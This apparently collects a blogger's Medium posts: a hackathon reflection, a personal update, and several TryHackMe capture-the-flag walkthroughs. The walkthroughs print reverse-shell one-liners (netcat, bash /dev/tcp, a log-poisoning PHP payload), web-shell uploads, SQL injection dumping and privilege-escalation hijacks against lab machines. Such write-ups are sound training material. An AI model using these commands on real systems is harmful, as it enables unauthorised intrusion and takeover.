Participating in a hackathon can be one of the most rewarding experiences for tech enthusiasts, whether you’re a seasoned developer or simply looking to challenge yourself. Recently, my company organized a hackathon, and I’m here to share why I believe everyone in tech should dive into such events. With a well-organized event and the right motivation — free goodies, prizes, food, and even alcohol — there’s so much to gain. More importantly, hackathons are about the learning, collaboration, and unforgettable memories you make.

Chapter 0 — What is a Hackathon anyway?

For those unfamiliar, a hackathon is an event where teams of tech professionals or enthusiasts come together to solve problems or create new solutions within a limited time frame, typically 24 to 72 hours. Teams often include members from diverse disciplines like frontend developers, backend engineers, network experts, and seldom DevOps engineers, depending on the project’s requirements.

The goal isn’t to deliver a polished, production-grade product but rather to present a working prototype of an idea. It’s all about innovation and creativity under pressure. Winners are usually awarded cash prizes, exclusive goodies, and recognition for their efforts. Beyond the tangible rewards, it’s an intense yet fun environment where you push your boundaries, learn new skills, meet like-minded people, and work like you always wanted to, with alcohol by your side.

Chapter 1 — My Motivation and Assembling a Team

As a DevOps Engineer, my role typically involves optimizing processes and tools. While I’m well-versed in best practices, I’ve rarely had the chance to dive deep into programming. A hackathon seemed like the perfect opportunity to explore uncharted waters and build something meaningful from scratch.

I rallied a team of my colleagues and close friends, all DevOps engineers like me. While it might seem counterintuitive to form a team without cross-functional expertise, our camaraderie and shared understanding of our roles made it an easy choice. After all, hackathons aren’t just about winning — they’re also about having fun and unleashing your creativity without worrying about perfection. Since this was an internal company event, the competitive yet collaborative vibe among colleagues made it even more exciting.

Chapter 2 — The Ideation Stage

The hackathon’s judging criteria included:

• 40 points for the idea’s impact
• 50 points for the working demo
• 10 points for cross-team collaboration

Since our team lacked cross-team collaboration (due to the team size cap of four members), we knew those 10 points were out the window. That meant we had to ace the impact and demo categories.

For our project, we focused on creating an Internal Developer Platform (IDP). As DevOps engineers, we often find ourselves as bottlenecks when developers need features deployed or infrastructure provisioned. Our IDP aimed to empower developers to perform critical tasks like onboarding new microservices and updating Kong routes independently through a user-friendly interface. This wasn’t just a project to win the competition — it was a solution to a real pain point in our organization.

Chapter 3 — And we are off to the races

After two weeks of anticipation, the hackathon finally kicked off. We received a starter kit that included a commemorative jacket, snacks, and energy drinks — essentials for the grueling 48 hours ahead.

Without diving too deep into technical details, here’s a high-level overview of our stack:

• Backstage.io for the user interface
• GitHub Actions for CI
• Terraform for CD

Despite being fully immersed in the hackathon, we couldn’t completely escape our regular duties. Developers frequently approached us with requests for provisioning infrastructure or resolving API gateway issues. Balancing our day-to-day responsibilities with the hackathon was challenging but also a reminder of the potential impact of our project.

Working with unfamiliar tools like TypeScript and Backstage.io posed significant hurdles. The documentation was sparse, and AI tools didn’t always provide clear answers. However, the internal nature of the hackathon meant we could reach out to colleagues for guidance. A friendly UI engineer saved the day multiple times when we hit roadblocks.

Chapter 4 — The Final Countdown

After 48 hours of intense coding, countless energy drinks, and some late-night beers, we had a working prototype. It wasn’t perfect, but it was functional — and that’s the essence of a hackathon.

We headed home for a short break before the final presentation. Exhausted but satisfied, we were ready to showcase our idea.

Chapter 5 — The Day of Reckoning

The hackathon featured 45 teams, but only the top 15 would progress to the final round. The pre-judging panel included VPs from tech, product, and marketing. They evaluated projects based on impact, functionality, and creativity.

Our demo went smoothly, and we felt confident about our chances. However, when the top 15 teams were announced, our hearts sank — our team name wasn’t called. Just as we were packing up, we discovered there had been a mix-up with another team’s name. Thankfully, we were still in the running.

During the final presentation to the judges panel comprised of our CEO, CTO, and other senior leaders, our demo worked flawlessly. Developers in the audience were visibly excited about the potential of our platform. Unfortunately, our idea didn’t resonate as strongly with the judges, who likely prioritized broader organizational impact over technical innovation.

The winners were announced a few hours later, and while we didn’t make the top three, we had no regrets. The winning projects were truly outstanding and deserved recognition. We celebrated their success and cherished the experience we’d gained.

Chapter 6 — Conclusion

Participating in a hackathon is an unparalleled experience that every tech professional should try at least once. It pushes you out of your comfort zone, introduces you to new technologies, and fosters a spirit of collaboration and innovation. For me, the hackathon was an opportunity to bond with my team, tackle real-world challenges, and create something impactful — even if it wasn’t perfect.

Whether you join for the prizes or the learning, a hackathon offers memories and lessons that stay with you long after the event ends. So, the next time you see a hackathon happening — be it internal or public — don’t hesitate. Dive in, and who knows? You might just surprise yourself with what you can achieve in 48 hours.

Not A Review: Why You Should Participate in a Hackathon was originally published in Readers Club on Medium, where people are continuing the conversation by highlighting and responding to this story.

Hello Dear Readers, I honestly have no idea how many of you are still following my blog (if any!), especially since it’s been over three years since I last posted. Ahem, but here we are. It’s a new year, and I’ve set myself a new goal: to write one blog post every weekend.

Now, don’t worry — I’m not just saying this to fill up space with random, half-baked thoughts. Quality will always come first. I might not be a professional writer like some of the other folks out there, but I can assure you that whatever I write will be the best I can offer at that moment.

As for the content, I’m keeping things open-ended. My previous posts were mostly tech-related, but I’m thinking of broadening my horizons. Expect a mix of topics: reflections on life, new food discoveries, travel stories from different cities and countries, and of course, tech. So, in short — whatever sparks my interest.

A little context for anyone who’s stumbled here since I last posted: I originally started this blog during the pandemic as a college student who loved cybersecurity, mostly out of boredom, if I’m being honest. But, alas, life had other plans, and I wasn’t able to fully pursue that interest. That said, not everything was bad. A lot has happened since then. I graduated from college, had to move out of my hometown, and now I’m working as a DevOps Engineer here in Bangalore, India. Life since then has been nothing short of a roller coaster ride. But after some time to reflect and re-calibrate, I’ve realized I miss writing and sharing my thoughts. So, as a Millennial with the cliché “new year, new me” mindset, I want to make this blog a regular part of my routine again.

And that’s it. That’s my life update in a nutshell. If any of you have suggestions on what topics you’d like to see me explore, feel free to drop them in the comments. I’ll do my best to make them happen!

See you soon,
Anubhav

The Three-Year Update was originally published in Readers Club on Medium, where people are continuing the conversation by highlighting and responding to this story.

Overview

Hey, how’s it going guys. I am back with another write-up, this time trying broker by M0N573R777 and ripcurlz.This was a very interesting box and a very unique box, showing the very minuscule security in the IoT devices. The box starts by scanning the higher ports to obtain the services running on them. One of the ports is hosting a MQTT broker, using which we find a topic to subscribe. We then, find a CVE, modify it a little, to get command injection on the machine, and get a reverse shell back. Finally, we use a misconfigured script, to gain root access. So, without anything else to say, let’s get started.

Wait, Before Proceeding!

There are a few things you must know and understand, before you continue on with the room.

What is MQTT?

MQ Telemetry Transport protocol(MQTT), is a protocol mainly used by Industrial IoT devices, like thermometers . Although, some exceptions do exist, like a smart home automation system.

Why does MQTT exists?

Everyone ( at least, everyone reading this article ), knows that the internet is based on the TCP/IP model. But, the main problem with the TCP/IP model, it is not optimized to work with unstable, low bandwidth networks. Also, working with constrained devices like sensors, where the data processing capabilities are already very low, and the TCP/IP network stack quickly becomes a problem . This is where MQTT comes in, it resides on top of the TCP/IP protocol, and uses a publish/subscribe messaging protocol which is specifically designed with unstable, unreliable low bandwidth connection in mind, and since it uses TCP for transmission, it has continuous session awareness.

What is the publish/subscribe messaging protocol?

Unlike the traditional client-server model used by TCP/IP, in which a client communicates directly with an endpoint(another client, or server), MQTT clients are split into two groups: A sender (referred to as a publisher in MQTT) and a consumer that receives the data (an MQTT subscriber). The publisher and the subscriber do not know anything about each other, and, in fact, are never in direct contact with each other. A third component (an MQTT broker), acts as the “middle man”, directing messages from the publisher to any end points acting as subscribers. (OOPS)

If you want to know more about what MQTT is, and how does it work visit http://www.steves-internet-guide.com/mqtt-basics-course/ .

All right!, with that out of the way.

Let’s Break In!

As always, start off with a NMap scan

sudo nmap -sS -sC -sV -oA nmap/broker -vv *THM Box IP*

NMap shows that two ports are open 1883(MQTT), 8161(ActiveMQ).

Port 8161 hosts a message broker, made by the Apache software foundation, ActiveMQ. Clicking on “Manage ActiveMQ broker” a box pops up, asking for the credentials. Trying some default passwords, logs us in as the admin.

The next task, requires the use of a MQTT client to access the information going through. To access it, a few things are required. Firstly, a MQTT client to connect to MQTT service, then a “topic” for which we will act as a subscriber and receive the data sent by the publisher.

Let’s check the broker for the list of topics, since we don’t have any. On visiting the “Topics” section of the broker, multiple topics are present, “secret_chat” being one of them. Interesting.

To subscribe to the topic, first install a MQTT client of your choice.Eclipse Mosquitto, developed by the Eclipse Foundation, has a tool called mosquitto_sub, which let’s you act as a subscriber.

Now, to subscribe to the topic, use the following command

mosquitto_sub -t 'secret_chat/#' -h *THM Box IP* -p 1883 -V mqttv31 --tls-version tlsv1.2

Here, -t: topic to subscribe, #: is a wildcard character, that lets you subscribe to multiple levels of the topic, -h: hostname or ip address, -p: port number of the MQTT service, -V: version of the MQTT service, --tls-version: it’s the tls version used by the service

P.S. Topics in MQTT are stored as directories, that’s why the “#” and “+” wildcard characters exist.

It would appear, two people are using the broker as a chatting service. Reading their chat, they seem to be discussing about a game. That’s a interesting way of using the service, not too secure though.

Now, to get machine access, we need to exploit a CVE for ActiveMQ. Searching exploit-db, a exploit is available. But, it doesn’t work as advertised, some changes are required to be made.

Using the PUT HTTP verb, and sending the payload to stored in the fileserver directory. The exploit doesn’t work, because our web-shell does not have permission to execute in the fileserver directory. The next logical thing would be to move it to a directory where it can. The question then arises, where?

While searching for an available solution for the exploit, I came across this great article by Knownsec 404 team, that explains the exploit more in depth, why it doesn’t work, and how to make it work.

The Knownsec 404 team, seems to move it to a directory called “apache-activemq-someversionnumber”. The next hurdle is figuring out the version number of the broker. NMap didn’t provide us with one, so we need to search for it manually. Using GoBuster, let’s try to find some endpoints.

Remember to put the “Authorization” header while making the requests, otherwise the application will just respond with 401(Unauthorized) codes. We have many results, on visiting the first directory, we find the version number, with the full path is reflected on the webpage.

Now, we can be absolutely sure that it is the path where we are supposed to move our shell, for it to be executed. Let’s make use of the MOVE method, and specify the destination path(inside the activemq.home/webapps/admin), to move our web-shell.

Then, go to “*THM box IP*/admin/cmd.jsp?cmd=” and pass the cmd variable any value, that you’ll like to execute on the machine.

And we got command execution, which means we can get a reverse shell to our machine. Using the normal bash reverse shell one liner, I was unable to get a reverse shell, probably some bad characters, messing up the command, so I made use of the NetCat reverse shell oneliner.

nc -e /bin/bash *Your tun0 IP* *port you’re listening on*

Remember to encode the spaces with either “+” sign, or using “%20”, otherwise the command won’t work.

The reverse shell was received as a user on the machine. Running sudo -l, the user activemq can run a python script as root, owned by activemq itself. This means, changing the content of the file, and executing it, will get us the root shell. Change the contents of the script with

import os
os.system(“/bin/bash”)

So, this was the box guys. Hope you guys enjoyed it

If you have any suggestions do let me know in the comments.

Have a beautiful day!

TryHackMe | Broker Writeup was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Overview

Hey, how’s it going guys. I am back with another write-up, this time trying Wekor by ustoun0. This was a very awesome machine, that proved to be harder than what I had initially thought.

• Wekor
• TryHackMe | ustoun0

We start by doing a simple port scan, and see that port 80 is open. Doing some directory brute-forcing on the initial website, we get a location to another website. On visiting that website, and poking around, we find a SQL injection vulnerability. From there, we make use of SQLMap to extract information. Going through the information, we find some WordPress credentials. Logging into WordPress, we edit a PHP page, to get a reverse shell. After getting into the machine, we enumerate the Memcached service to find the user password. Once that is done, we reverse an elf binary file, and spoof a system binary to get to the root. So, without anything else to say, let’s get started.

Let’s break in!

As always, start off with an NMap scan.

sudo nmap -sS -sV -sC -oA nmap/wekor *THM Box IP* -vv

On running NMap, we have only two ports open 22(ssh) and 80(HTTP). Let’s visit the website on port 80.

On visiting the website, we are greeted with a message.

There was also a robots.txt on the website, on visiting the robots.txt, we get many different directory paths. Sadly, all of them redirect us to 404(Not Found), except for one “/comingreallysoon”.
Here, we find that the actual web-site can be found on “/it-next” location. Let’s visit the website.

On visiting the website, we see that it is some company’s website, offering computer solutions. After some poking around, we see that there is a form field on the checkout portion of the website, there they ask for a coupon code.
Testing for a possible SQL injection, trying to put just a single quote, the website reflects an error message.

It is certain that the “Apply Coupon” field is vulnerable to SQL injection, so let’s run SQLMap on it and let’s see what we can uncover.

sqlmap -r $PWD/ApplyCoupon.req --dump-all --batch

Here -r: To point SQLMap to the actual request, give it the full path otherwise it’ll error out. --dump-all: to dump all the data that is available through SQLi on our local machine. --batch: To give default values to any prompt, so that the process is not paused in the background, waiting for user interaction.

P.S. You can easily capture the request using any proxy tool.

Since, I primarily use burp for my “proxying” needs, I can give you a little help with that. Just put burp in intercept mode, proxy your browser to burp, once burp intercepts the request, right click on the request and click save item. And now you can pass the file to SQLMap. One little nugget of information, replace the value of the variable you need to test with a “*”. SQLMap, will only test this particular variable, saving time. And time, as they say, is money.

The method of capturing requests, should almost be the same on any other tool you use.

After some time when SQLMap finishes it’s work. We have a ton of information, but the one that is interesting is the “WordPress” folder, with username and password hashes of different users. The hashes are of the WordPress(MD5) category. Using hashcat, and the rockyou wordlist we can easily crack the password hashes.

hashcat -m 400 -a 0 hashfile.txt /path/to/the/wordlist

All password hashes are cracked, except for the admin password hash, looks like someone is following the rules.

But, we didn’t find any WordPress blog. And, there is nothing else left to uncover on this website. So, let’s try virtual host brute-forcing, using GoBuster. After GoBuster finishes running, we see that we have a result, the web-site has a subdomain “site”, which is a WordPress blog.
Navigating to “/wp-admin” we get a login form. Let’s try using the credentials we got.

Using the first set of credentials we get nothing interesting. Jeffrey is just a normal WordPress user, with no rights.
Trying the second set of credentials, we see that Yura is a WordPress admin, awesome!. This means that we can get a reverse shell.

To Get the reverse shell, navigate to “Theme Editor”, there we can edit any template, I decided to edit the “404.php”. Paste the php-reverse-shell by pentestmonkey, make the required changes to the ip and port field of the script and save the template.

From there, navigate to /wp-content/themes/twentytwentyone/404.php, while listening on the port using NetCat, to receive the reverse shell.

Once in the machine, we see that we are logged in as “www-data”. Running linPEAS, we find nothing interesting. Looking for services running on the machine, we see that a service is running on the higher port 11211.
Using some Google-Fu, we find that the name of the service is “Memcached” and we can enumerate the service for it may store some information.
Equipped with this information, lets try enumerating the service.

Wait, what is Memcached and why are we looking for information inside it?

Well, Memcached is a distributed memory caching system. Just like the swap partition on your Linux machine, except it usually runs on servers.What happens is, whenever the server runs out of memory(RAM), it will take some pieces of information, which were requested a certain time ago, move those information to the cache system, so that it can free up memory for the current tasks. To keep track of the time, the server uses expiration timeouts. Once, the time of an information expires, it automatically moves it to the Memcached service. And if that information is required again, instead of doing the calculation for the query over and over again, the server can just use the cached information.

So, let’s get going. We can connect to the service using Telnet.

telnet localhost 11211
stats items (shows everything in the cache)
stats cachedump 1 0 (dump everything in the slab id(1))
get user (user query information in the cache)
get password (password query information in the cache)

press Ctrl+] to bring up the telnet prompt
type close to exit from telnet

We get the password for the user Orka.
Running linPEAS again on the machine, we find that our user can write in the “/usr/sbin” directory. Let’s keep this information in the back of our mind, as it will prove very useful in a bit.
Running sudo -l, we see that our user can only run an elf binary, “bitcoin” as root. Running the executable, it prompts us for a password, which we don’t have.

Transferring the binary to our machine, and reversing it using ghidra, we find the required password, and we see that the binary is making a system call to a script “tranfer.py”.
The binary is using an absolute path for calling the script, and an absolute path was used for the binary in the sudoers file, but, it is using a relative path for calling the python binary. And remember, we can write to “/usr/sbin” which has a higher precedence(in this machine) over “/usr/bin”, where the actual python binary resides.
What this means, is that the system will look for the python binary in “/usr/sbin” before looking somewhere else, which means we can place our own bogus program, give it the same name, and the system will execute it instead of the actual python binary.

Let’s cd to “/usr/sbin”, then:

touch python (create a file named python)
vim python   (put in the bogus code)
     #!/bin/bash
     /bin/bash
     :wq!
chmod +x python (give it executable permission)

Let’s try executing our bogus python binary.

And, voila we get our root shell.

So, that was the box, hope you guys enjoyed it.

If you have any suggestions, do let me know in the comments.

Have a beautiful day!

TryHackMe | Wekor Writeup was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Overview

Hey, how’s it going everybody. I am back with another write-up, this time trying Team by dalemazza.

• Team
• TryHackMe | dalemazza

This was an easy rated box, but in my opinion should have been a medium rated box just because of the sheer number of steps required to gain the initial foothold on the machine. On visiting the website, we are greeted with a default Apache2 page. After some initial recon, we find that the box is using a Virtual host domain, on visiting the second domain, we fuzz for the credentials of the FTP service running on port 21. From there we find the name of the subdomain, and on visiting it we see that a php script on the domain is vulnerable to LFI. Using LFI we again, fuzz to find the ssh key of the user. After SSH’ing into the machine, we first do a lateral privilege escalation to gain access to another user on the box. After that, we edit a script run by a root cronjob, to gain a reverse shell as root. Without anything else to say, let’s get started.

Let’s Break In!

As always, start off with a NMap scan.

sudo nmap -sS -sV -sC -oA nmap/team *THM Box IP* -vv

Here -sS: SYN Scan, -sC: for “Safe” Scripts, or default scripts, -sV: for version enumeration, -oA: output in all format(Greppable, XML and default NMap output), -vv: for verbose.

On, running the NMap scan, we have 3 ports open: 21(ftp), 22(ssh) and 80(http). The ftp service has anonymous login disabled, so let’s visit the web-server running on port 80. On visiting the web-server, we are greeted with a default Apache login page. Using GoBuster to find anything interesting, we get nothing.

cat /usr/share/seclists/Discovery/Web-Content/raft-small/words.txt | grep -v -P ‘^\.’ | gobuster dir -u http://*THM box IP*/ -w - -o gobuster.log -t 50 -x php

Here, dir: to specify directory brute-forcing, -u to specify the target URL, -w to specify the word list, I use raft-small-words.txt. It is included in the sec-lists over at GitHub, which you can clone in your own distribution, and I recommend that you do, because they are very useful. Otherwise you can just download this particular word list from here. -x: to specify the extension. This switch will add a .php after every word to check if a file also exists. You can specify multiple file types, separated by a comma. — threads: to specify the number of processes making requests at a time. Use this switch very cautiously, as in the real world, huge number of requests to a website will get you blacklisted. Since this is a virtual environment, it shouldn’t be a problem. -o: to specify the output file.

I used grep to remove any lines that began with a ‘.’, since anything beginning with it was giving a 403(not authorized) error code, and it was cluttering the screen.

After finding nothing on the default page, I tried adding team.thm domain to my ‘/etc/hosts’ so that my browser can redirect me to it. And sure enough, there was another webpage on the server. It would appear that the server is using Virtual Domain Name Hosting.

Using GoBuster on this domain, we get multiple hits, but only two of them seemed interesting robots.txt and /scripts/ . Visiting robots.txt, we see that there is only one word in the file ‘dale’, guessing that it might be a username, I moved forward. Visiting /scripts/, we are not authorized to view the root directory, so again let’s use GoBuster on it, to see if we are authorized to view any file. After GoBuster finished, we see that we are authorized to view just one file ‘script.txt’.

The user had a note that there was another file with the name script, but had it’s extension changed as it had credentials in it. So, let’s fuzz for the extension using ffuf.

ffuf -w /usr/share/seclists/Discovery/Web-content/raft-small-extension -u ‘http://team.thm/scripts/scriptFUZZ’ -fc 403,404

Here, -w: to specify the word-list to use, -u: to specify the URL to fuzz, FUZZ: to specify the location in URL to fuzz, -fc: to filter the results by HTTP status code.

Using the above command, we find the extension of the old script, and with it the credentials to the ftp server.

Getting in the ftp server, we find a file named New_site.txt. Reading it, we find that the user also has a ‘.dev’ website hosted on the server. Using GoBuster in vhost mode, we find a subdomain for team.thm.

gobuster vhost -u http://team.thm/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -o gobuster.vhost.log -t 100

After adding the new subdomain to our ‘/etc/hosts/’, let’s visit the web-site. On visiting the website, it was evident that the website is still in development. Clicking on the only link on the website, we see that it is a PHP script, probably using the include function. Testing the variable ‘page’, we see that it is vulnerable to LFI.

Now, this part took me a hot minute to complete. In the New_site.txt it was mentioned that the user dale has to copy his ‘id_rsa’ key and save it in a config file. After trying different methods to escalate LFI to RCE, and failing spectacularly, I tried fuzzing for the ‘id_rsa’.

Using LFI-Jhaddix.txt word-list in seclists, and ffuf, I finally got the ‘id_rsa’ for the user dale. Oh!, sweet-release.

I am leaving the ssh-key here, I know it’s against the rules, but dude, if you can type a whole-ass ssh key without trying to actually find it, you are freaking c̶r̶a̶z̶y amazing. Anyhow, moving on. After using some Linux-foo to get the key back in it’s original format, let’s ssh into the machine.

P.S. To get the key in the original format, just paste it a file. Let’s call it a.txt, then do cat a.txt | sed ‘s/ #/\r\n/g’ > id_rsa . To simplify what is happening here. We are using sed to replace any occurrence of ‘ #’ with a newline.

Or, you can just do it manually.

After getting in the machine, we see that there is another user ‘gyles’ in the machine. As Gyles was instructing dale, it is safe to assume that the user Gyles has more privileges than our current user. On, running sudo -l as the user dale, we see that we can run a script ‘admin_checks’ as user gyles with elevated privileges and NOPASSWD. Reading the script ‘admin_check’, it asks for the users name and date, and then passes the ‘date variable’ to the ‘date command’ to be executed. This was very easy to exploit, just pass ‘/bin/bash’ as date, and we have a shell.

After some poking around, I was unable to find anything. So, I transferred pspy over from my my machine, to look for any processes running in the background. After waiting some time, we see that root is running a cronjob for ‘script.sh’. On, checking for the permission on the script, we see that our user is able to edit the script.sh. So let’s edit it to gain a reverse shell on our machine.

Save it, and start a listener on your machine, to listen for an incoming connection from the box. After waiting a few seconds, we get a reverse shell back on our machine as the root user.

So, that was the box. Hope you guys enjoyed it.

If you have any suggestions, let me know in the comments.

Have a beautiful day!

TryHackMe | Team Writeup was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Hey, how is it going everybody. I am back with another write-up, this time trying JPGChat by R4v3n. This was a rather easy box, with one interesting twist, you have to do a little GitHub search to find the source code of the chatting service. From there, you get a reverse shell back and gain the initial foothold. After that, there was one python executable that the user could run with root privileges without password. To exploit it, you had to spoof the PYTHONPATH variable. So, without anything else to say, let’s start with the box.

Let’s Break In!

As always, start off with a NMap scan.

sudo nmap -sS -sV -sC -oA nmap/chat *THM Box IP* -vv

Here -sS: SYN Scan, -sC: for “Safe” Scripts, or default scripts, -sV: for version enumeration, -oA: output in all format(Greppable, XML and default NMap output), -vv: for verbose.

After NMap finished scanning, we see that we only have two ports open 22(ssh) and 3000(ppp). On visiting the service on port 3000 through our browser, we see that we have some instructions on how to use the service. But, the service was not fully functional when visiting through the web-browser.

So let’s use NetCat to connect to the service.

nc *THM Box IP* 3000 

After connecting through NetCat, we see that both the messaging and the reporting functionality is available to us. The service also tells us, that the source code can be found at the admins GitHub. To find the admin’s name, we connect to the [REPORT] functionality of the service and the service leaks the admin’s name. Now, to find the source code, just after a little bit of poking around in GitHub, we find the source code of the service.

The service is making use of the os module of python and running the commands using the bash shell. We can easily get the reverse shell by using the generic bash reverse shell one-liner.

bash -i >& /dev/tcp/*Your OpenVPN IP*/*port you’re listening on*

The machine did get a connection, but it was always breaking for some reason. So, let’s use another one liner with encoded characters.

0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196

For more awesome one-liners like this, visit swisskysrepo’s GitHub repository.

And this time we got the reverse shell without any issues. But, this shell was not usable because the command outputs were not visible on screen. But, we did have command execution. So, we can once again make the machine connect to us, to gain reverse shell.

bash -c 'bash -i >& /dev/tcp/*Your OpenVPN IP*/*port you’re listening on*'

Now we have a usable shell. Let’s upgrade to a fully TTY shell.

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

This will give you a slightly better shell, but without those magical features. To get a fully functioning TTY shell:

Press Ctrl-z to background the current shell, then on your terminal type:
stty raw -echo; fg <enter><enter>

Then on your shell:

stty rows 36 cols 136
export TERM=xterm-256color

User-Flag: THM{w4it_h0w_c4n_th3s_b3}

Now, to escalate our privileges to root. Running sudo -l we get a prompt that our user can run test-module.py as root NOPASSWD. We cannot modify the script, but we can read it.

The script is importing a compare module, this means we can spoof the PYTHONPATH variable, and create our own bogus compare.py module, and use it to get root.

cd /tmp

export PYTHONPATH=$PWD
touch compare.py
chmod +x compare.py

Wait!, but what is PYTHONPATH, and how did you know this script is using it.Worry not, for I am about to tell you just that.

So, PYTHONPATH is a environment variable and as the name suggests, is the PATH in which the python script looks for the invoked modules IF the module is not in the default global directory. So, that means if for instance an python script was trying to invoke a predefined module(ex. os), spoofing the PYTHONPATH will have no affect on the script, as it won’t access the path variable.

How did we the script was using it, firstly when you sudo -l , notice on the upper right corner it says env_keep+=PYTHONPATH, that means when invoking anything as sudo, it will keep the PYTHONPATH environment variable. Secondly, if you read the script and if you have a little bit of python programming knowledge, you’ll notice that the module “compare” which is being imported, is not a standard module of the python programming language, which can mean that the user might not have installed it in the global directory, which again leads to the same conclusion.

Now inside compare.py, make a system call to invoke bash as sudo.

#!/usr/bin/env python3
import os

os.system("/bin/bash")

What just happened here?

Well, this script is very basic, but not all of you might understand what happened here. So, we imported a module called os, which gives us the capability of calling and executing system commands from our script, then we used the system function, to invoke a bash shell. If you run this script as a normal user, nothing will change. But, if you run this with root privileges, you’ll have a root shell.

That is all fine, but why did importing a module got us a root shell?

Well, when you import a module in python, or in any other language really, it can either import a specified function or class in that module, or the whole package. In this scenario, it is importing the whole package(specified by the ‘*’ wildcard). Then, it invokes a function in the compare module, as soon as that line gets executed, our bogus module starts doing it’s thing. It invokes a bash shell with root privileges, and the script is stuck in the background. When you exit from the root shell, back to the normal user, you might’ve noticed that it gives an error, the specified function was not found. This means, that all this time, the script was stuck in calling the function, which gave our shell persistence.

This was just a very layman explanation of it, if you want to get into really technical details, read this very thorough article.

Now, run the test-module.py as sudo. And we get root.

Root-Flag: THM{h4h4h4_g0t_y4_sUck3rs}

So, that was the box, hope you guys enjoyed it.

Have a beautiful day!

TryHackMe | JPGChat Writeup was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

You can find this room here: https://tryhackme.com/room/archangel

Overview

This is a Easy rated boot2root box, made by TryHackMe user Archangel. This box makes use of the Virtual Domain Name Hosting method. Once you get to the correct domain, you have to exploit the PHP include() function to get an LFI and then use that LFI to get a reverse shell on the machine. Once in, you need to exploit a cronjob to gain horizontal privilege. Finally, you need to spoof the PATH variable, to gain root access. Without any further ado, let’s get into it.

Let’s Break In!

Like always, first start with an Nmap scan:

sudo nmap -sS -sV -sC -oA nmap/archangel *THM Box IP* -vv

Here -sS: SYN Scan, -sC: for “Safe” Scripts, or default scripts, -sV: for version enumeration, -oA: output in all format(Greppable, XML and default Nmap output), -vv: for verbose.

Nmap scan was completed fairly quickly, and we see that two ports are open on this machine. Port 80 and Port 22, which are default ports for HTTP and SSH respectively. Since we don’t have any way to login to the ssh right now, lets visit the webpage hosted on this machine.

On visiting the machine, we can see that it filled with a lot of Lorem Ipsum, nothing interesting there. Except, we see a domain based email “mafialive.thm”, in the websites contact info. It would appear that this website is using virtual domain name hosting. If you’d like to know more about VDNH you can do so by going here, where I go more in detail over this topic.

Coming back to our machine, add the new domain to our hosts file(IP address<space>domain name), and lets visit this website. On opening the website, a message appears saying this website is under development, with our very first flag, displayed right under it.

Next, we are asked to find a page under development. Now, there are two ways you can go about it:

The very first and a clever way(which my dumb-ass totally didn’t think of), is visiting the robots.txt file, and there you have it “test.php”.

What is robots.txt you ask?, consider it as a gatekeeper for a website. Ever wonder why sensitive data, such as admin webpages, assets and other information that a website stores never show up when you search for something?, robots.txt is your answer. Whenever a search-engine starts crawling a website for information, it first visits robots.txt, which then tells what location the search-engine, can and cannot crawl. So this information never shows up on search engines. The only problem with this, robots.txt has to be publicly accessible for the search-engine to view it. This means, that anyone in the world, with a little technological knowledge, can also read this file and visit the sup3r-s3cr3t location manually, completely defeating the purpose. This is the reason why different methods like .htaccess were invented, where you can implement user authentication for your secret webpage.

The second, and the scrub way of doing it, is by FUZZING the website. Yay, now I don’t have to do any thinking!. Just kidding, most of the time you will have to use a Fuzz tool in your workflow, I know I have to in every other box.
I like to use Gobuster for this task, you can use any tool you prefer.

gobuster dir -u http://mafialive.thm/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -x php,txt — threads 50 -o gobuster.out

Here, dir: to specify directory brute-forcing, -u to specify the target URL, -w to specify the word-list, I use raft-small-wordlist. It is included in the SecLists over at GitHub, which you can clone in your own distro, and I recommend that you do, because they are very useful. Otherwise you can just download this particular word-list from here. -x: to specify the extension. This switch will add a .php and a .txt after every directory name to check if a file with the same name (also)exists. You can specify multiple file types, separated by a comma. --threads: to specify the number of requests made at a time. Use this switch very cautiously, as in the real world, huge number of request to a website will get you blacklisted. Since this is a virtual environment, it shouldn’t be a problem. -o: to specify the output file.

And Gobuster displays the same expected output “test.php”, so let’s go to this location. On visiting the location we see that this webpage wasn’t supposed to be deployed, which means lax security. *Happy Hacker Noises*.

There is a button present on the webpage, pressing it displays a message “Control is an illusion”. A Mr.Robot reference, nice!. And aptly placed too, because we are about to take away control using LFI(Local File Inclusion). Proxying the request through burp, we capture it and send it to burp repeater for further inspection.
After testing for LFI using some basic payloads, nothing turned up. I can’t read any file from outside the given directory, probably a check in place. We know a “robots.txt” file exists in this directory, lets try that. Substituting “mrrobot.php” with “robots.txt”, the content of “robots.txt” was reflected. Success!.

Next step was to actually examine the test.php, which should also be in the same folder. Replacing “robots.txt” for “test.php”, nothing turned up. Weird. Then I remembered that it was a PHP file, and won’t be rendered as normal. So, to actually read the contents of the file, I needed to parse it to something else. PHP has a inbuilt function to convert normal text to base64, so using that, the payload then became:

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

And we get the output in base64. We can decode it using CyberChef, or anything else really, and read the contents of test.php.

We can see that indeed, there was a check in place, so that we can’t traverse our path, and that “/var/www/html/development_testing” has to be included. So anything that we can do is restricted to this directory only, or is it!?(*Getting Dem Phoenix Wright Feels*). The thing is, that Linux treats “//” as “/”, so that means, even if “../..” is blocked, we can easily bypass it using “..//..”.

Bypassing the path traversal protection, and reading the access.log file, I saw that User-agent was being logged. Doing a simple google search showed me that indeed, this can be converted to RCE(Remote Code Execution) using a simple technique.
First, make a simple request to the domain, replacing the normal User-Agent with:

<?php exec(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc *Your machine IP* 4444 >/tmp/f’) ?>

Then, open a netcat session in your terminal

nc -lvnp 4444 

Here -l: to listen for an incoming connection request, -n: to stop netcat from performing domain name resolution, -v: for verbose and -p: to specify which port to listen on.

Then make another request to the website, this time by using LFI and calling access.log, which would've now logged our malicious code we passed as User-Agent, and will now execute it.

http://mafialive/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log

And we get a shell back. Awesome, isn’t it?

